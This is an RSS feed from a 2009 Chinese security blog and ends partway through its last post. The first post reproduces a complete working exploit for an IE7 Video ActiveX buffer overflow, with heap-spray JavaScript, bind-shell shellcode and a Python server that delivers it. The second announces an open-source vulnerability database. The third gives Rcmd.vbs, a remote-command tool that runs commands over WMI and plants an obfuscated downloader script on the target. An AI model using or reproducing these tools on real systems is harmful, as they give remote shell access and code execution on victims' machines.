<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" version="2.0">

<channel>
	<title>鬼仔's Blog</title>
	
	<link>http://huaidan.org</link>
	<description>关注网络安全</description>
	<lastBuildDate>Fri, 10 Jul 2009 09:28:13 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/ghostboy" type="application/rss+xml" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item>
		<title>MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit</title>
		<link>http://huaidan.org/archives/3218.html</link>
		<comments>http://huaidan.org/archives/3218.html#comments</comments>
		<pubDate>Fri, 10 Jul 2009 09:26:52 +0000</pubDate>
		<dc:creator>鬼仔</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[Activex]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[IE7]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://huaidan.org/archives/3218.html</guid>
		<description><![CDATA[milw0rm.com [2009-07-10]
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Video ActiveX Exploit  (Advisory 972890) 	      #
####################################################... ]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.milw0rm.com/exploits/9108" target="_blank">milw0rm.com</a> [2009-07-10]</p>
<p>#!/usr/bin/env python<br />
###############################################################################<br />
# MS Internet Explorer 7 Video ActiveX Exploit  (Advisory 972890) 	      #<br />
###############################################################################<br />
<span id="more-3218"></span></p>
<p>#									      #<br />
# Tested on Windows 2003 SP2 R2, XPSP3 IE7			 	      #<br />
#				 				 	      #<br />
# Written by SecureState R&amp;D Team 	                                      #<br />
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin       #<br />
# http://www.securestate.com				 		      #<br />
#									      #<br />
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #<br />
#									      #<br />
###############################################################################<br />
#<br />
#<br />
# It's somewhat unreliable, can crash IE at times, found it to be around a 60%<br />
# hit.<br />
#<br />
# This exploit is publicly being exploited in the wild, opted to release this<br />
# to the research community. Microsoft is aware of the vulnerability.<br />
#<br />
###############################################################################<br />
#<br />
#<br />
# [-] Exploit sent... [-]<br />
# [-] Wait about 30 seconds and attempt to connect.[-]<br />
# [-]telnet/nc to IP Address: 10.211.55.140 and port 5500 [-]<br />
#<br />
# relik@sslinuxvm1:~$ telnet 10.211.55.140 5500<br />
# Trying 10.211.55.140...<br />
# Connected to 10.211.55.140.<br />
# Escape character is '^]'.<br />
# Microsoft Windows [Version 5.2.3790]<br />
# (C) Copyright 1985-2003 Microsoft Corp.<br />
#<br />
# C:\Documents and Settings\Administrator\Desktop&gt;<br />
from BaseHTTPServer import HTTPServer<br />
from BaseHTTPServer import BaseHTTPRequestHandler<br />
import sys,binascii<br />
try:<br />
import psyco<br />
psyco.full()<br />
except ImportError:<br />
pass<br />
class myRequestHandler(BaseHTTPRequestHandler):<br />
try:<br />
def do_GET(self):<br />
# Always Accept GET<br />
self.printCustomHTTPResponse(200)<br />
# Site root: Main Menu<br />
if self.path == "/ohn0es.jpg":<br />
unhex=binascii.unhexlify("000300001120340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00")<br />
self.wfile.write(unhex)<br />
if self.path == "/":<br />
target=self.client_address[0]<br />
self.wfile.write("""&lt;html&gt;&lt;head&gt;""")<br />
self.wfile.write("""<br />
// Javascript code taken from multiple exploits and exploits that are being actively exploited in the wild<br />
&lt;script language="JavaScript" defer&gt;<br />
function Check() {<br />
//  win32_bind -  EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai http://metasploit.com */<br />
var shellcode = unescape("%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3");<br />
var bigblock = unescape("%u9090%u9090");<br />
var headersize = 20;<br />
var slackspace = headersize + shellcode.length;<br />
while (bigblock.length &lt; slackspace) bigblock += bigblock;<br />
var fillblock = bigblock.substring(0,slackspace);<br />
var block = bigblock.substring(0,bigblock.length - slackspace);<br />
while (block.length + slackspace &lt; 0x40000) block = block + block + fillblock;<br />
var memory = new Array();<br />
for (i = 0; i &lt; 350; i++){ memory[i] = block + shellcode}<br />
var myObject=document.createElement('object');<br />
DivID.appendChild(myObject);<br />
myObject.width='1';<br />
myObject.height='1';<br />
myObject.data='./ohn0es.jpg';<br />
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';<br />
}<br />
&lt;/script&gt;<br />
&lt;/head&gt;<br />
&lt;body onload="Check();"&gt;<br />
&lt;div id="DivID"&gt; """)<br />
self.wfile.write("""&lt;title&gt;MS Internet Explorer 7 Video ActiveX Exploit  (Advisory 972890)&lt;/title&gt;&lt;/head&gt;&lt;body&gt;""")<br />
self.wfile.write("""&lt;left&gt;&lt;body bgcolor="Black"&gt;&lt;font color="White"&gt;&lt;p&gt;Exploit is running...&lt;/p&gt;&lt;br&gt;""")<br />
print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-]telnet/nc to IP Address: %s and port 5500 [-]" % (target))<br />
# Print custom HTTP Response<br />
def printCustomHTTPResponse(self, respcode):<br />
self.send_response(respcode)<br />
self.send_header("Content-type", "text/html")<br />
self.send_header("Server", "myRequestHandler")<br />
self.end_headers()</p>
<p># In case of exceptions, pass them<br />
except Exception:<br />
pass</p>
<p>httpd = HTTPServer(('', 80), myRequestHandler)<br />
print ("""<br />
###################################################################################</p>
<p>#    MS Internet Explorer 7 Video ActiveX Exploit  (Advisory 972890)              #<br />
###################################################################################<br />
#									          #<br />
# Tested on Windows 2003 SP2 R2, WinXPSP3			 	          #<br />
#				 				 	          #<br />
# Written by SecureState R&amp;D Team        			 	          #<br />
# http://www.securestate.com				 		          #<br />
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin           #<br />
#									          #<br />
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind     #<br />
#									          #<br />
# It's somewhat unreliable, can crash IE at times, found it to be around a 60%    #<br />
# hit. 									          #<br />
#									          #<br />
# This exploit is publicly being exploited in the wild, opted to release this     #<br />
# to the research community. Microsoft is aware of the vulnerability              #<br />
# (Advisory 972890).								  #<br />
#									          #<br />
###################################################################################<br />
""")<br />
print ("[-] Starting MS Internet Explorer 7 Video ActiveX Exploit:80 [-]")<br />
print ("[-] Have someone connect to you on port 80 [-]")<br />
print ("Type &lt;control&gt;-c to exit..")<br />
try:<br />
# handle the connections<br />
httpd.handle_request()<br />
# Serve HTTP server forever<br />
httpd.serve_forever()<br />
# Except Keyboard Interrupts and throw custom message<br />
except KeyboardInterrupt:<br />
print ("\n\nExiting exploit...\n\n")<br />
sys.exit()</p>
<hr />
<a href="http://huaidan.org/archives/3218.html#respond" target="_blank"><strong>发表评论</strong></a> | 分类：<a href="http://huaidan.org/archives/category/technology" title="显示技术文章的所有日志" rel="category tag">技术文章</a><br /><br />

© 鬼仔 for <a href="http://huaidan.org" target="_blank">鬼仔's Blog</a>, 2009. | 本文网址：<a href="http://huaidan.org/archives/3218.html" target="_blank">http://huaidan.org/archives/3218.html</a><img src="http://img.tongji.linezing.com/708134/tongji.gif" alt="" />
	<h4>相关日志</h4>
	<ul class="st-related-posts">
	<li><a href="http://huaidan.org/archives/1946.html" title="Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit (2008/05/03)">Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit</a> (4)</li>
	<li><a href="http://huaidan.org/archives/1497.html" title="联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp) (2007/11/24)">联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)</a> (0)</li>
	<li><a href="http://huaidan.org/archives/824.html" title="winzip FileView ActiveX Contorls CreateNewFolderFromName溢出exploit (2007/01/01)">winzip FileView ActiveX Contorls CreateNewFolderFromName溢出exploit</a> (2)</li>
	<li><a href="http://huaidan.org/archives/846.html" title="Sina UC 2006 Activex SendDownLoadFile Exploit (2007/01/10)">Sina UC 2006 Activex SendDownLoadFile Exploit</a> (0)</li>
	<li><a href="http://huaidan.org/archives/845.html" title="Sina UC 2006 Activex SendChatRoomOpt Exploit (2007/01/10)">Sina UC 2006 Activex SendChatRoomOpt Exploit</a> (0)</li>
</ul>


<p><a href="http://feedads.g.doubleclick.net/~a/qyx22OpRlo_nqbFGOaLPbKEBlXQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/qyx22OpRlo_nqbFGOaLPbKEBlXQ/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/qyx22OpRlo_nqbFGOaLPbKEBlXQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/qyx22OpRlo_nqbFGOaLPbKEBlXQ/1/di" border="0" ismap="true"></img></a></p>]]></content:encoded>
			<wfw:commentRss>http://huaidan.org/archives/3218.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>SEBUG 开源</title>
		<link>http://huaidan.org/archives/3217.html</link>
		<comments>http://huaidan.org/archives/3217.html#comments</comments>
		<pubDate>Thu, 09 Jul 2009 10:56:01 +0000</pubDate>
		<dc:creator>鬼仔</dc:creator>
				<category><![CDATA[业界资讯]]></category>
		<category><![CDATA[sebug]]></category>

		<guid isPermaLink="false">http://huaidan.org/archives/3217.html</guid>
		<description><![CDATA[作者： amxku
Info:sebug Information Management System
Author:amxku@sebug.net
http://sebug.net
http://wolfexp.net
http://huaidan.org
sebug.net的建立离不开一些朋友和组织的帮助,在此对他们表示感谢!
如果有什么漏洞，也请... ]]></description>
			<content:encoded><![CDATA[<p>作者： <a href="http://amxku.net/sebug-open-source/">amxku</a></p>
<p>Info:sebug Information Management System<br />
Author:amxku@sebug.net<br />
<a href="http://sebug.net" target="_blank">http://sebug.net</a><br />
<a href="http://wolfexp.net" target="_blank">http://wolfexp.net</a><br />
<a href="http://huaidan.org" target="_blank">http://huaidan.org</a></p>
<p>sebug.net的建立离不开一些朋友和组织的帮助,在此对他们表示感谢!<br />
如果有什么漏洞，也请大家高抬贵手。谢谢。如果有什么好的建议，我们很欢迎。</p>
<p>同时也希望有志同道合的朋友能一起来运营这个站点。<br />
<span id="more-3217"></span></p>
<p>======================================================================<br />
├─forumdata<br />
│  ├─backup  //数据备份目录<br />
│  ├─lang    //言语文件目录<br />
│  ├─sebug_cache  //数据目录<br />
│  ├─templates  //模板<br />
│  │  ├─admin  //后台模板<br />
│  │  └─default   //前台模板<br />
│  └─templates_c<br />
├─image  //后台程序文件<br />
├─images  //图片文件<br />
│   ├─perate_img<br />
│  └─sponsors<br />
└─include  //程序文件<br />
├─Chart<br />
├─class<br />
├─func<br />
└─jscript</p>
<p>后台是/admin.php<br />
用户名和密码大家自己在admin.php里面自己改改吧。32位md5。</p>
<p>$admin['name']  = 'admin';<br />
$admin['pass'] =  '21232f297a57a5a743894a0e4a801fc3';</p>
<p>大家自己捣鼓吧!</p>
<p>======================================================================</p>
<p>版权声明</p>
<p>已经都共享了，就留点版权吧<br />
虽然不是什么好东西，但是也请尊重下作者的劳动吧</p>
<p>======================================================================</p>
<p>1、说点什么</p>
<p>本站点的建立离不开一些朋友和组织的帮助,在此对他们表示感谢!<br />
我们着眼于网络安全的学习和探讨,之所以开发SEBUG  Security vulnerability  Database是为了更方便的管理与收集国内外网络安全缺陷以及漏洞资料。如果您有任何问题和意见，请直接与我们联系s1 [at] sebug.net  ,再次感谢您的支持!</p>
<p>2、结构<br />
a、搜索<br />
请在文本框内输入您要搜索的程序名称或是SSV  ID,搜索该程序出现的各种漏洞，本系统暂不支持多关键词等逻辑功能。</p>
<p>b、信息上报<br />
本系统提供了上报模块 [点击上报]  ，需注册用户后才能提交上报信息，应选择信息类别[Exploits，Vulnerabilities]。其中（*）部分必须填写。在提交后，系统审计人员会对信息进行审核，在通过审核后，该信息才会显示在数据库中。</p>
<p>c、RSS输出<br />
[RSS  Mirror_1], [RSS Mirror_2] , 提供RSS输出。</p>
<p>d、Javascript调用<br />
[Javascript] ,  提供JS调用。</p>
<p>e、网站地图<br />
[SiteMap] ,  网站地图。</p>
<p>3、发展历程<br />
2006年08月01日，SEBUG开始筹备阶段。<br />
2006年08月13日，sebug.net  域名正式注册生效。<br />
2006年08月18日，Bug Exp Search  @BETA版发布。内容以管理与收集国内外网络安全缺陷以及漏洞资料为主。<br />
2006年10月25日，SEBUG正式版发布。网站再次进行外观上的大改版，优化整理了部分代码，修补了若干安全隐患。<br />
2007年7月，Bug Exp Search 正式更名为 安全漏洞信息库[SEBUG Security vulnerability  Database]，简称 SSVDB。<br />
2008年6月，SSVDB Forums  上线，信息安全技术交流平台，以讨论安全服务及其相关标准为主。<br />
2008年7月，开始有更多的朋友关注和支持，SEBUG安全数据库重新整理了部分代码。数据库已达到10800余条记录。<br />
2008年8月，“SEBUG Security vulnerability  Database”很荣幸被国内知名杂志“黑客手册”采访，并且刊登封面。杂志详细的报道和介绍“SEBUG Security vulnerability  Database”核心成员以及“SEBUG Security vulnerability  Database”的发展史。<br />
2008年10月，站点改版，从脚本到数据库都进行了重新设计。这次改版从形式到内容，都将是一个比较大的飞跃，站点有了很强的可扩展性。<br />
2009年01月，关闭了SSVDB Forums。<br />
2009年02月，启用了新的用户管理系统，沿用了以前的用户数据库。<br />
2009年04月，重新整理了数据库结构。<br />
2009年05月，添加appdir模块，更新数据库及网站架构。</p>
<p>4、感谢曾经对SEBUG做出贡献的人员(乱序)<br />
4ngle、鬼仔、枫三少、王洁、Neeao、CDNunion、hqlong</p>
<p>5、声明<br />
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!</p>
<p>SEBUG开源是为了更好的发展，from the  internet.for the internet 。</p>
<p>大小: 312615 字节<br />
修改时间: 2009年7月9日, 18:30:29<br />
MD5:  38822BDC1E2E27A44D933234F0E42271<br />
SHA1:  C159FE37A13A41ED78761806126130E88484D644<br />
CRC32: 8E0ECF01</p>
<p><strong>下载地址：</strong><a href="http://down.chinaz.com/soft/25793.htm" target="_blank">http://down.chinaz.com/soft/25793.htm</a></p>
<p><a href="http://huaidan.org/wp-content/uploads/2009/07/sebug.rar">备份</a></p>
<hr />
<a href="http://huaidan.org/archives/3217.html#respond" target="_blank"><strong>发表评论</strong></a> | 分类：<a href="http://huaidan.org/archives/category/news" title="显示业界资讯的所有日志" rel="category tag">业界资讯</a><br /><br />

© 鬼仔 for <a href="http://huaidan.org" target="_blank">鬼仔's Blog</a>, 2009. | 本文网址：<a href="http://huaidan.org/archives/3217.html" target="_blank">http://huaidan.org/archives/3217.html</a><img src="http://img.tongji.linezing.com/708134/tongji.gif" alt="" />
	<h4>相关日志</h4>
	<ul class="st-related-posts">
	<li>无相关日志</li>
	</ul>


<p><a href="http://feedads.g.doubleclick.net/~a/B5r7ifb56gqywal8eZG_0Sl-Bwg/0/da"><img src="http://feedads.g.doubleclick.net/~a/B5r7ifb56gqywal8eZG_0Sl-Bwg/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/B5r7ifb56gqywal8eZG_0Sl-Bwg/1/da"><img src="http://feedads.g.doubleclick.net/~a/B5r7ifb56gqywal8eZG_0Sl-Bwg/1/di" border="0" ismap="true"></img></a></p>]]></content:encoded>
			<wfw:commentRss>http://huaidan.org/archives/3217.html/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Rcmd.vbs 1.01修正版</title>
		<link>http://huaidan.org/archives/3215.html</link>
		<comments>http://huaidan.org/archives/3215.html#comments</comments>
		<pubDate>Thu, 09 Jul 2009 02:38:22 +0000</pubDate>
		<dc:creator>鬼仔</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[cmd]]></category>
		<category><![CDATA[rcmd]]></category>
		<category><![CDATA[WMI]]></category>
		<category><![CDATA[渗透]]></category>

		<guid isPermaLink="false">http://huaidan.org/archives/3215.html</guid>
		<description><![CDATA[作者：lcx
原来是NP写的，代码在这里
我修正了几个小bug。加了一个在对方机器上直接生成一个down.vbs，用来下载用。这个down.vbs的用法看这里：

代码：
On Error Resume Next
Set outstreem=Wscript.stdout
If (... ]]></description>
			<content:encoded><![CDATA[<p>作者：<a href="http://hi.baidu.com/myvbscript/blog/item/88f2c21b9bcb5fdcac6e7551.html" target="_blank">lcx</a></p>
<p>原来是NP写的，代码在<a href="http://hi.baidu.com/myvbscript/blog/item/92e5d93dd18218ce9e3d6227.html" target="_blank">这里</a></p>
<p>我修正了几个小bug。加了一个在对方机器上直接生成一个down.vbs，用来下载用。这个down.vbs的用法看<a href="http://hi.baidu.com/myvbscript/blog/item/b64592267c8e4c118b82a102.html" target="_blank">这里</a>：<br />
<span id="more-3215"></span></p>
<p>代码：</p>
<pre><code>On Error Resume Next
Set outstreem=Wscript.stdout
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Wscript.Quit
End If

If Wscript.arguments.Count&lt;4 Then
Wscript.echo "Not enough Parameters."
usage()
Wscript.Quit
End If
ip=Wscript.arguments(0)
username=Wscript.arguments(1)
password=Wscript.arguments(2)
CmdStr=Wscript.arguments(3)
EchoStr=Wscript.arguments(4)
'downstr=Wscript.arguments(5)
foldername="c:\\windows\\temp\\"

wsh.echo "Conneting "&amp;ip&amp;" ...."
Set objlocator=CreateObject("wbemscripting.swbemlocator")
Set objswbemservices=objlocator.connectserver(ip,"root/cimv2",username,password)
showerror(err.number)
Set Win_Process=objswbemservices.Get("Win32_ProcessStartup")
Set Hide_Windows=Win_Process.SpawnInstance_
Hide_Windows.ShowWindow=12
Set Rcmd=objswbemservices.Get("Win32_Process")
Set colFiles = objswbemservices.ExecQuery _
("Select * from CIM_Datafile Where Name = 'c:\\windows\\temp\\read.vbs'")
If colFiles.Count = 0 Then
wsh.echo "Not found read.vbs! Create Now!"
Create_read()

End If
If EchoStr = "0" Then
msg=Rcmd.create("cmd /c "&amp;CmdStr,Null,Hide_Windows,intProcessID)
End if
If EchoStr = "1" Then
msg=Rcmd.create("cmd /c cscript %windir%\temp\read.vbs """&amp;CmdStr&amp;"""",Null,Hide_Windows,intProcessID)
End If

If EchoStr = "3" Then
Create_down()
End If

If msg = 0 Then
wsh.echo "Command success..."
Else
showerror(Err.Number)
End If

wsh.echo "Please Wait 3 Second ...."
wsh.sleep(3000)
Set StdOut = Wscript.StdOut
Set oReg=objlocator.connectserver(ip,"root/default",username,password).Get("stdregprov")
oReg.GetMultiStringValue &amp;H80000002,"SOFTWARE\Clients","cmd" ,arrValues
wsh.echo String(79,"*")
wsh.echo cmdstr&amp;Chr(13)&amp;Chr(10)

For Each strValue In arrValues
StdOut.WriteLine strValue
Next
oReg.DeleteValue &amp;H80000002,"SOFTWARE\Clients","cmd"

Sub Create_read()
RunYN =Rcmd.create("cmd /c echo set ws=WScript.CreateObject(^""WScript.Shell^"")&gt; %windir%\temp\read.vbs"_
&amp;"&amp;&amp;echo str=ws.Exec(^""cmd /c ^""^&amp;wscript.arguments(0)).StdOut.ReadAll:set ws=nothing&gt;&gt; %windir%\temp\read.vbs"_
&amp;"&amp;&amp;echo Set oReg=GetObject(^""winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv^"")&gt;&gt; %windir%\temp\read.vbs"_
&amp;"&amp;&amp;echo oReg.SetMultiStringValue ^&amp;H80000002,^""SOFTWARE\Clients^"",^""cmd^"",Array(str) &gt;&gt; %windir%\temp\read.vbs",Null,Hide_Windows,intProcessID)
If RunYN = 0 Then
wsh.echo "read.vbs Created!!!"
Else
showerror(Err.Number)
End If

End Sub

sub Create_down()
Rundw=Rcmd.create("cmd /c echo Function Decode(s,n):ns=Split(Mid(s,2,Len(s)-1)):For i=0 To UBound(ns):on error resume next:Decode=Decode^&amp;Chr(CInt(ns(i)) Xor n):Next:End Function&gt;%windir%\temp\down.vbs"_
&amp;"&amp;&amp;echo Execute(Decode(^"" 26 9 18 31 8 21 19 18 92 15 29 10 25 58 21 16 25 84 26 21 16 25 18 29 17 25 80 15 8 14 85 113 118 113 118 92 92 92 92 92 15 25 8 92 29 24 19 24 30 47 8 14 25 29 17 92 65 92 63 14 25 29 8 25 51 30 22 25 31 8 84 94 61 56 51 56 62 94 92 90 92 94 82 94 92 90 92 94 47 8 14 25 29 17 94 85 113 118 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 40 5 12 25 65 92 77 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 51 12 25 18 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 11 14 21 8 25 92 15 8 14 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 47 29 10 25 40 19 58 21 16 25 92 26 21 16 25 18 29 17 25 80 78 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 63 16 19 15 25 113 118 113 118 25 18 24 92 26 9 18 31 8 21 19 18 113 118 113 118 91 83 83 42 62 -13695 -10347 -10282 -20072 -19531 -18814 -17020 -10566 -18291 -13631 113 118 58 9 18 31 8 21 19 18 92 49 9 16 8 21 62 5 8 25 40 19 62 21 18 29 14 5 84 49 9 16 8 21 62 5 8 25 85 113 118 113 118 92 92 92 92 92 56 21 17 92 46 47 80 92 48 49 9 16 8 21 62 5 8 25 80 92 62 21 18 29 14 5 113 118 92 92 92 92 92 63 19 18 15 8 92 29 24 48 19 18 27 42 29 14 62 21 18 29 14 5 92 65 92 78 76 73 113 118 92 92 92 92 92 47 25 8 92 46 47 92 65 92 63 14 25 29 8 25 51 30 22 25 31 8 84 94 61 56 51 56 62 82 46 25 31 19 14 24 15 25 8 94 85 113 118 92 92 92 92 92 48 49 9 16 8 21 62 5 8 25 92 65 92 48 25 18 62 84 49 9 16 8 21 62 5 8 25 85 113 118 92 92 92 92 92 53 26 92 48 49 9 16 8 21 62 5 8 25 66 76 92 40 20 25 18 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 58 21 25 16 24 15 82 61 12 12 25 18 24 92 94 17 62 21 18 29 14 5 94 80 92 29 24 48 19 18 27 42 29 14 62 21 18 29 14 5 80 92 48 49 9 16 8 21 62 5 8 25 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 51 12 25 18 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 61 24 24 50 25 11 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 84 94 17 62 21 18 29 14 5 94 85 82 61 12 12 25 18 24 63 20 9 18 23 92 49 9 16 8 21 62 5 8 25 92 90 92 63 20 14 62 84 76 85 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 41 12 24 29 8 25 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 62 21 18 29 14 5 92 65 92 46 47 84 94 17 62 21 18 29 14 5 94 85 82 59 25 8 63 20 9 18 23 84 48 49 9 16 8 21 62 5 8 25 85 113 118 92 92 92 92 92 57 18 24 92 53 26 113 118 92 92 92 92 92 49 9 16 8 21 62 5 8 25 40 19 62 21 18 29 14 5 92 65 92 62 21 18 29 14 5 113 118 113 118 57 18 24 92 58 9 18 31 8 21 19 18 113 118 113 118 113 118 26 9 18 31 8 21 19 18 92 25 4 25 31 84 85 113 118 92 92 92 92 92 113 118 92 92 92 92 92 91 83 83 -14659 -20046 -19311 -12657 113 118 92 92 92 92 92 19 18 92 25 14 14 19 14 92 14 25 15 9 17 25 92 50 25 4 8 113 118 92 92 92 92 92 47 25 8 92 29 14 27 15 92 65 92 43 47 31 14 21 12 8 82 61 14 27 9 17 25 18 8 15 113 118 21 26 92 29 14 27 15 82 63 19 9 18 8 92 65 92 76 92 8 20 25 18 113 118 92 92 92 92 92 43 47 31 14 21 12 8 82 57 31 20 19 92 94 41 15 29 27 25 70 92 63 47 31 14 21 12 8 92 24 19 11 18 82 10 30 15 92 9 14 16 92 31 70 32 77 82 25 4 25 94 113 118 92 92 92 92 92 43 47 31 14 21 12 8 82 45 9 21 8 92 77 113 118 92 92 92 92 92 25 18 24 92 53 26 113 118 92 92 92 92 92 92 24 21 17 92 24 29 8 29 80 8 80 23 23 80 26 21 16 25 18 29 17 25 80 15 15 113 118 92 92 92 92 92 47 25 8 92 49 29 21 16 77 92 65 92 63 14 25 29 8 25 51 30 22 25 31 8 84 94 63 56 51 82 49 25 15 15 29 27 25 94 85 113 118 92 92 92 92 92 49 29 21 16 77 82 63 14 25 29 8 25 49 52 40 49 48 62 19 24 5 92 29 14 27 15 82 53 8 25 17 84 76 85 92 80 79 77 92 113 118 91 49 29 21 16 77 82 63 14 25 29 8 25 49 52 40 49 48 62 19 24 5 92 94 31 70 32 4 4 4 32 16 31 4 82 25 4 25 81 12 26 82 20 8 17 94 80 79 77 113 118 92 92 92 92 92 15 15 65 92 49 29 21 16 77 82 52 40 49 48 62 19 24 5 113 118 92 92 92 92 92 47 25 8 92 49 29 21 16 77 65 18 19 8 20 21 18 27 92 92 113 118 113 118 92 92 92 113 118 113 118 92 92 92 92 92 91 83 83 -19009 -19007 -13695 -16735 113 118 92 92 92 92 92 24 29 8 29 92 92 92 92 92 92 92 92 92 92 92 92 92 65 92 15 15 113 118 92 92 92 92 92 91 83 83 -19009 -19007 -12616 -17278 -15481 113 118 92 92 92 92 92 26 21 16 25 18 29 17 25 92 92 92 92 92 65 92 29 14 27 15 82 53 8 25 17 84 77 85 113 118 113 118 92 92 92 92 92 91 83 83 -19009 -19007 -13695 -16735 -19496 -18764 113 118 92 92 92 92 92 92 92 92 92 9 92 65 92 16 25 18 84 24 29 8 29 85 113 118 92 92 92 92 92 113 118 92 92 92 92 92 91 83 83 -17523 -19009 -12616 -17278 -13695 -10347 113 118 92 92 92 92 92 26 19 14 92 21 65 77 92 8 19 92 9 92 15 8 25 12 92 78 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 8 92 65 92 17 21 24 84 24 29 8 29 80 21 80 78 85 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 23 23 92 65 92 23 23 92 90 92 63 20 14 62 84 31 16 18 27 84 94 90 52 94 92 90 92 8 85 85 113 118 92 92 92 92 92 18 25 4 8 113 118 113 118 92 92 92 92 92 91 83 83 -10282 -20072 -19531 -18814 -17020 -10566 -18291 -13631 113 118 92 92 92 92 92 24 29 8 29 61 14 14 5 92 65 92 49 9 16 8 21 62 5 8 25 40 19 62 21 18 29 14 5 84 23 23 85 113 118 92 92 92 92 92 113 118 92 92 92 92 92 91 83 83 -20001 -19302 -12616 -17278 92 92 92 92 92 113 118 92 92 92 92 92 15 29 10 25 58 21 16 25 92 26 21 16 25 18 29 17 25 80 24 29 8 29 61 14 14 5 113 118 113 118 92 92 92 92 113 118 92 92 92 92 25 18 24 92 26 9 18 31 8 21 19 18 113 118 113 118 25 4 25 31 84 85 113 118 92 113 118 113 118^"",124))&gt;&gt;%windir%\temp\down.vbs",Null,Hide_Windows,intProcessID)

If Rundw = 0 Then
wsh.echo "down.vbs Created!!!"
Else
showerror(Err.Number)
End If

End Sub

Function showerror(errornumber)
If errornumber Then
wsh.echo "Error 0x"&amp;CStr(Hex(Err.Number))&amp;" ."
If Err.Description &lt;&gt; "" Then
wsh.echo "Error Description: "&amp;Err.Description&amp;"."
End If
Wscript.Quit
Else
